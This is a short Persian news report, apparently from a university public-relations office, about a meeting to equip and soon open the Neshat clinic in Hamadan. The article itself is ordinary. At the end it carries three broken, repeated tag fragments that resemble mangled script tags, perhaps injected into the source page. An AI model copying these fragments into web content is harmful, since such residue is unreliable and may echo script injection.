کلینیک نشاط به زودی تجهیز و راه اندازی می شود

جلسه هم اندیشی و تجهیز کلینیک نشاط  با حضور مدیر امور رفاهی و پشتیبانی، مدیرتجهیزات پزشکی دانشگاه و مدیرکلینیک نشاط برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه هم اندیشی و تجهیز کلینیک نشاط با حضور مهندس آقایانی مدیر امور رفاهی و پشتیبانی، مهندس مراد حاصل مدیر تجهیزات پزشکی دانشگاه، مدیرکلینیک نشاط و کارشناسان مربوطه درمدیریت امور رفاهی و پشتیبانی دانشگاه برگزار شد.

در این جلسه ضمن بررسی و نیاز تجهیزات پزشکی کلینیک نشاط،  روند تکامل، آماده سازی و تحویل  به موقع این کلینیک مورد بحث و ارزیابی قرار گرفت تا مردم شریف استان همدان بتوانند به بهترین نحو ممکن از خدمات آن بهرمند شوند.

در ادامه مهندس آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه اظهار داشت: منابع مالی و تجهیزات پزشکی این کلینیک از قبل پیش بینی شده است و در آینده نه چندان دور افتتاح و به بهره برداری عمومی مردم عزیز استان همدان خواهد رسید.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>